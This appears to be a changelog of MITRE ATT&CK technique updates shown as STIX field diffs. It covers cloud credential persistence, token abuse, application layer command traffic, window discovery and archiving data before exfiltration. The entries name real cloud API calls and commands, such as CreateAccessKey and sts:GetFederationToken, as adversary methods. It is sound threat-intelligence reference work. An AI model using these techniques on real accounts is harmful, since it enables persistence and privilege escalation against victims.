In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)

New Description:
Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment.
For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals)
In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the <code>CreateKeyPair</code> or <code>ImportKeyPair</code> API in AWS or the <code>gcloud compute os-login ssh-keys add</code> command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes)
Adversaries may also use the <code>CreateAccessKey</code> API in AWS or the <code>gcloud iam service-accounts keys create</code> command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation)
In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)

Dropped Detections:

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:20:47.020000+00:00 | 2023-04-12 21:30:31.151000+00:00
description | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation) | Adversaries may add adversary-controlled credentials to a cloud account to maintain persistent access to victim accounts and instances within the environment. For example, adversaries may add credentials for Service Principals and Applications in addition to existing legitimate credentials in Azure AD.(Citation: Microsoft SolarWinds Customer Guidance)(Citation: Blue Cloud of Death)(Citation: Blue Cloud of Death Video) These credentials include both x509 keys and passwords.(Citation: Microsoft SolarWinds Customer Guidance) With sufficient permissions, there are a variety of ways to add credentials including the Azure Portal, Azure command line interface, and Azure or Az PowerShell modules.(Citation: Demystifying Azure AD Service Principals) In infrastructure-as-a-service (IaaS) environments, after gaining access through [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004), adversaries may generate or import their own SSH keys using either the CreateKeyPair or ImportKeyPair API in AWS or the gcloud compute os-login ssh-keys add command in GCP.(Citation: GCP SSH Key Add) This allows persistent access to instances within the cloud environment without further usage of the compromised cloud accounts.(Citation: Expel IO Evil in AWS)(Citation: Expel Behind the Scenes) Adversaries may also use the CreateAccessKey API in AWS or the gcloud iam service-accounts keys create command in GCP to add access keys to an account. If the target account has different permissions from the requesting account, the adversary may also be able to escalate their privileges in the environment (i.e. [Cloud Accounts](https://attack.mitre.org/techniques/T1078/004)).(Citation: Rhino Security Labs AWS Privilege Escalation) In AWS environments, adversaries with the appropriate permissions may also use the `sts:GetFederationToken` API call to create a temporary set of credentials tied to the permissions of the original user account. These credentials may remain valid for the duration of their lifetime even if the original account’s API credentials are deactivated. (Citation: Crowdstrike AWS User Federation Persistence)
external_references[1]['source_name'] | Expel IO Evil in AWS | Crowdstrike AWS User Federation Persistence
external_references[1]['description'] | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020. | Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.
external_references[1]['url'] | https://expel.io/blog/finding-evil-in-aws/ | https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/
external_references[2]['source_name'] | Demystifying Azure AD Service Principals | Expel IO Evil in AWS
external_references[2]['description'] | Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020. | A. Randazzo, B. Manahan and S. Lipton. (2020, April 28). Finding Evil in AWS. Retrieved June 25, 2020.
external_references[2]['url'] | https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/ | https://expel.io/blog/finding-evil-in-aws/
external_references[3]['source_name'] | GCP SSH Key Add | Demystifying Azure AD Service Principals
external_references[3]['description'] | Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020. | Bellavance, Ned. (2019, July 16). Demystifying Azure AD Service Principals. Retrieved January 19, 2020.
external_references[3]['url'] | https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add | https://nedinthecloud.com/2019/07/16/demystifying-azure-ad-service-principals/
external_references[4]['source_name'] | Blue Cloud of Death Video | GCP SSH Key Add
external_references[4]['description'] | Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019. | Google. (n.d.). gcloud compute os-login ssh-keys add. Retrieved October 1, 2020.
external_references[4]['url'] | https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815 | https://cloud.google.com/sdk/gcloud/reference/compute/os-login/ssh-keys/add
external_references[5]['source_name'] | Blue Cloud of Death | Blue Cloud of Death Video
external_references[5]['description'] | Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019. | Kunz, Bruce. (2018, October 14). Blue Cloud of Death: Red Teaming Azure. Retrieved November 21, 2019.
external_references[5]['url'] | https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1 | https://www.youtube.com/watch?v=wQ1CuAPnrLM&feature=youtu.be&t=2815
external_references[6]['source_name'] | Microsoft SolarWinds Customer Guidance | Blue Cloud of Death
external_references[6]['description'] | MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020. | Kunz, Bryce. (2018, May 11). Blue Cloud of Death: Red Teaming Azure. Retrieved October 23, 2019.
external_references[6]['url'] | https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/ | https://speakerdeck.com/tweekfawkes/blue-cloud-of-death-red-teaming-azure-1
external_references[7]['source_name'] | Expel Behind the Scenes | Microsoft SolarWinds Customer Guidance
external_references[7]['description'] | S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020. | MSRC. (2020, December 13). Customer Guidance on Recent Nation-State Cyber Attacks. Retrieved December 17, 2020.
external_references[7]['url'] | https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/ | https://msrc-blog.microsoft.com/2020/12/13/customer-guidance-on-recent-nation-state-cyber-attacks/
external_references[8]['source_name'] | Rhino Security Labs AWS Privilege Escalation | Expel Behind the Scenes
external_references[8]['description'] | Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022. | S. Lipton, L. Easterly, A. Randazzo and J. Hencinski. (2020, July 28). Behind the scenes in the Expel SOC: Alert-to-fix in AWS. Retrieved October 1, 2020.
external_references[8]['url'] | https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/ | https://expel.io/blog/behind-the-scenes-expel-soc-alert-aws/
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.4 | 2.5
iterable_item_added
STIX Field | Old value | New Value
external_references | | {'source_name': 'Rhino Security Labs AWS Privilege Escalation', 'description': 'Spencer Gietzen. (n.d.). AWS IAM Privilege Escalation – Methods and Mitigation. Retrieved May 27, 2022.', 'url': 'https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/'}
x_mitre_contributors | | Dylan
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Active Directory: Active Directory Object Modification |

[T1098.003] Account Manipulation: Additional Cloud Roles

Current version: 2.2

Version changed from: 2.1 → 2.2

Details
values_changed
STIX Field | Old value | New Value
modified | 2022-10-24 15:21:19.955000+00:00 | 2023-04-14 22:48:50.142000+00:00
x_mitre_attack_spec_version | 2.1.0 | 3.1.0
x_mitre_version | 2.1 | 2.2

[T1546.010] Event Triggered Execution: AppInit DLLs

Current version: 1.1

Version changed from: 1.0 → 1.1

Details
dictionary_item_added
STIX Field | Old value | New Value
x_mitre_attack_spec_version | | 3.1.0
x_mitre_deprecated | | False
values_changed
STIX Field | Old value | New Value
modified | 2020-11-10 18:29:31.076000+00:00 | 2023-04-21 12:33:45.568000+00:00
x_mitre_version | 1.0 | 1.1
iterable_item_added
STIX Field | Old value | New Value
x_mitre_data_sources | | Windows Registry: Windows Registry Key Modification
iterable_item_removed
STIX Field | Old value | New Value
x_mitre_data_sources | Windows Registry: Windows Registry Key Modification |

[T1550.001] Use Alternate Authentication Material: Application Access Token

Current version: 1.5

Version changed from: 1.4 → 1.5


Old Description:
Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)
In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)
OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

New Description:
Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials.
Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019)
OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta)
For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017)
Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles)
Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords.
For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.

Details
dictionary_item_added (STIX Field: New value)
external_references: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019.

dictionary_item_removed (STIX Field: Old value)
external_references: CAPEC-593

values_changed (STIX Field: Old value → New value)
modified: 2022-10-21 17:01:05.286000+00:00 → 2023-04-15 00:29:43.297000+00:00
description:
  Old value: Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used as a way to access resources in cloud and container-based applications and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. Access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.
  New value: Adversaries may use stolen application access tokens to bypass the typical authentication process and access restricted accounts, information, or services on remote systems. These tokens are typically stolen from users or services and used in lieu of login credentials. Application access tokens are used to make authorized API requests on behalf of a user or service and are commonly used to access resources in cloud, container-based applications, and software-as-a-service (SaaS).(Citation: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019) OAuth is one commonly implemented framework that issues tokens to users for access to systems. These frameworks are used collaboratively to verify the user and determine what actions the user is allowed to perform. Once identity is established, the token allows actions to be authorized, without passing the actual credentials of the user. Therefore, compromise of the token can grant the adversary access to resources of other sites through a malicious application.(Citation: okta) For example, with a cloud-based email service, once an OAuth access token is granted to a malicious application, it can potentially gain long-term access to features of the user account if a "refresh" token enabling background access is awarded.(Citation: Microsoft Identity Platform Access 2019) With an OAuth access token an adversary can use the user-granted REST API to perform functions such as email searching and contact enumeration.(Citation: Staaldraad Phishing with OAuth 2017) Compromised access tokens may be used as an initial step in compromising other services. For example, if a token grants access to a victim’s primary email, the adversary may be able to extend access to all other services which the target subscribes by triggering forgotten password routines. In AWS and GCP environments, adversaries can trigger a request for a short-lived access token with the privileges of another user account.(Citation: Google Cloud Service Account Credentials)(Citation: AWS Temporary Security Credentials) The adversary can then use this token to request data or perform actions the original account could not. If permissions for this feature are misconfigured – for example, by allowing all users to request a token for a particular account - an adversary may be able to gain initial access to a Cloud Account or escalate their privileges.(Citation: Rhino Security Labs Enumerating AWS Roles) Direct API access through a token negates the effectiveness of a second authentication factor and may be immune to intuitive countermeasures like changing passwords. For example, in AWS environments, an adversary who compromises a user’s AWS API credentials may be able to use the `sts:GetFederationToken` API call to create a federated user session, which will have the same permissions as the original user but may persist even if the original user credentials are deactivated.(Citation: Crowdstrike AWS User Federation Persistence) Additionally, access abuse over an API channel can be difficult to detect even from the service provider end, as the access can still align well with a legitimate workflow.
external_references[1]['source_name']: Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019 → Crowdstrike AWS User Federation Persistence
external_references[1]['description']: Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019. → Vaishnav Murthy and Joel Eng. (2023, January 30). How Adversaries Can Persist with AWS User Federation. Retrieved March 10, 2023.
external_references[1]['url']: https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/ → https://www.crowdstrike.com/blog/how-adversaries-persist-with-aws-user-federation/
external_references[2]['source_name']: AWS Logging IAM Calls → Auth0 - Why You Should Always Use Access Tokens to Secure APIs Sept 2019
external_references[2]['description']: AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022. → Auth0. (n.d.). Why You Should Always Use Access Tokens to Secure APIs. Retrieved September 12, 2019.
external_references[2]['url']: https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html → https://auth0.com/blog/why-should-use-accesstokens-to-secure-an-api/
external_references[3]['source_name']: AWS Temporary Security Credentials → AWS Logging IAM Calls
external_references[3]['description']: AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022. → AWS. (n.d.). Logging IAM and AWS STS API calls with AWS CloudTrail. Retrieved April 1, 2022.
external_references[3]['url']: https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html → https://docs.aws.amazon.com/IAM/latest/UserGuide/cloudtrail-integration.html
external_references[4]['source_name']: Microsoft Identity Platform Access 2019 → AWS Temporary Security Credentials
external_references[4]['description']: Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019. → AWS. (n.d.). Requesting temporary security credentials. Retrieved April 1, 2022.
external_references[4]['url']: https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens → https://docs.aws.amazon.com/IAM/latest/UserGuide/id_credentials_temp_request.html
external_references[5]['source_name']: Google Cloud Service Account Credentials → Microsoft Identity Platform Access 2019
external_references[5]['description']: Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022. → Cai, S., Flores, J., de Guzman, C., et. al.. (2019, August 27). Microsoft identity platform access tokens. Retrieved October 4, 2019.
external_references[5]['url']: https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials → https://docs.microsoft.com/en-us/azure/active-directory/develop/access-tokens
external_references[6]['source_name']: GCP Monitoring Service Account Usage → Google Cloud Service Account Credentials
external_references[6]['description']: Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022. → Google Cloud. (2022, March 31). Creating short-lived service account credentials. Retrieved April 1, 2022.
external_references[6]['url']: https://cloud.google.com/iam/docs/service-account-monitoring → https://cloud.google.com/iam/docs/creating-short-lived-service-account-credentials
external_references[7]['source_name']: okta → GCP Monitoring Service Account Usage
external_references[7]['description']: okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019. → Google Cloud. (2022, March 31). Monitor usage patterns for service accounts and keys . Retrieved April 1, 2022.
external_references[7]['url']: https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen → https://cloud.google.com/iam/docs/service-account-monitoring
external_references[8]['source_name']: Rhino Security Labs Enumerating AWS Roles → okta
external_references[8]['description']: Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022. → okta. (n.d.). What Happens If Your JWT Is Stolen?. Retrieved September 12, 2019.
external_references[8]['url']: https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration → https://developer.okta.com/blog/2018/06/20/what-happens-if-your-jwt-is-stolen
external_references[9]['source_name']: Staaldraad Phishing with OAuth 2017 → Rhino Security Labs Enumerating AWS Roles
external_references[9]['description']: Stalmans, E.. (2017, August 2). Phishing with OAuth and o365/Azure. Retrieved October 4, 2019. → Spencer Gietzen. (2018, August 8). Assume the Worst: Enumerating AWS Roles through ‘AssumeRole’. Retrieved April 1, 2022.
external_references[9]['url']: https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/ → https://rhinosecuritylabs.com/aws/assume-worst-aws-assume-role-enumeration
external_references[10]['source_name']: capec → Staaldraad Phishing with OAuth 2017
external_references[10]['url']: https://capec.mitre.org/data/definitions/593.html → https://staaldraad.github.io/2017/08/02/o356-phishing-with-oauth/
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.4 → 1.5

iterable_item_added (STIX Field: New value)
x_mitre_contributors: Dylan

[T1071] Application Layer Protocol

Current version: 2.1

Version changed from: 2.0 → 2.1


Old Description: Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.  Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.

New Description: Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.  Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.
Details
dictionary_item_added (STIX Field: New value)
x_mitre_attack_spec_version: 3.1.0
x_mitre_contributors: ['Duane Michael']
x_mitre_deprecated: False

values_changed (STIX Field: Old value → New value)
modified: 2020-10-21 16:35:45.986000+00:00 → 2023-04-11 14:35:41.468000+00:00
description:
  Old value: Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.
  New value: Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server. Adversaries may utilize many different protocols, including those used for web browsing, transferring files, electronic mail, or DNS. For connections that occur internally within an enclave (such as those between a proxy or pivot node and other nodes), commonly used protocols are SMB, SSH, or RDP.
x_mitre_data_sources[0]: Network Traffic: Network Traffic Flow → Network Traffic: Network Traffic Content
x_mitre_data_sources[1]: Network Traffic: Network Traffic Content → Network Traffic: Network Traffic Flow
x_mitre_version: 2.0 → 2.1

[T1010] Application Window Discovery

Current version: 1.3

Version changed from: 1.2 → 1.3


Old Description: Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021)

New Description: Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020)  Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.

Dropped Mitigations:

Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-19 02:07:41.751000+00:00 → 2023-04-15 16:46:04.776000+00:00
description:
  Old value: Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used or give context to information collected by a keylogger.(Citation: Prevailion DarkWatchman 2021)
  New value: Adversaries may attempt to get a listing of open application windows. Window listings could convey information about how the system is used.(Citation: Prevailion DarkWatchman 2021) For example, information about application windows could be used identify potential data to collect as well as identifying security tooling ([Security Software Discovery](https://attack.mitre.org/techniques/T1518/001)) to evade.(Citation: ESET Grandoreiro April 2020) Adversaries typically abuse system features for this type of enumeration. For example, they may gather information through native system features such as [Command and Scripting Interpreter](https://attack.mitre.org/techniques/T1059) commands and [Native API](https://attack.mitre.org/techniques/T1106) functions.
external_references[1]['source_name']: Prevailion DarkWatchman 2021 → ESET Grandoreiro April 2020
external_references[1]['description']: Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022. → ESET. (2020, April 28). Grandoreiro: How engorged can an EXE get?. Retrieved November 13, 2020.
external_references[1]['url']: https://www.prevailion.com/darkwatchman-new-fileless-techniques/ → https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/
x_mitre_attack_spec_version: 2.1.0 → 3.1.0
x_mitre_version: 1.2 → 1.3

iterable_item_added (STIX Field: New value)
external_references: {'source_name': 'Prevailion DarkWatchman 2021', 'description': 'Smith, S., Stafford, M. (2021, December 14). DarkWatchman: A new evolution in fileless techniques. Retrieved January 10, 2022.', 'url': 'https://www.prevailion.com/darkwatchman-new-fileless-techniques/'}
x_mitre_data_sources: Command: Command Execution

iterable_item_removed (STIX Field: Old value)
x_mitre_data_sources: Command: Command Execution

[T1560.001] Archive Collected Data: Archive via Utility

Current version: 1.2

Version changed from: 1.1 → 1.2


Old Description: Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.  Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems. On Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, <code>xcopy</code> on Windows can copy files and directories with a variety of options.  Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)

New Description: Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport.  Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as <code>tar</code> on Linux and macOS or <code>zip</code> on Windows systems.   On Windows, <code>diantz</code> or <code> makecab</code> may be used to package collected files into a cabinet (.cab) file. <code>diantz</code> may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) <code>xcopy</code> on Windows can copy files and directories with a variety of options. Additionally, adversaries may use [certutil](https://attack.mitre.org/software/S0160) to Base64 encode collected data before exfiltration.   Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
Details
values_changed (STIX Field: Old value → New value)
modified: 2022-04-20 17:17:48.612000+00:00 → 2023-04-14 19:28:21.394000+00:00
description:
  Old value: Adversaries may use utilities to compress and/or encrypt collected data prior to exfiltration. Many utilities include functionalities to compress, encrypt, or otherwise package data into a format that is easier/more secure to transport. Adversaries may abuse various utilities to compress or encrypt data before exfiltration. Some third party utilities may be preinstalled, such as tar on Linux and macOS or zip on Windows systems. On Windows, diantz or makecab may be used to package collected files into a cabinet (.cab) file. diantz may also be used to download and compress files from remote locations (i.e. [Remote Data Staging](https://attack.mitre.org/techniques/T1074/002)).(Citation: diantz.exe_lolbas) Additionally, xcopy on Windows can copy files and directories with a variety of options. Adversaries may use also third party utilities, such as 7-Zip, WinRAR, and WinZip, to perform similar activities.(Citation: 7zip Homepage)(Citation: WinRAR Homepage)(Citation: WinZip Homepage)
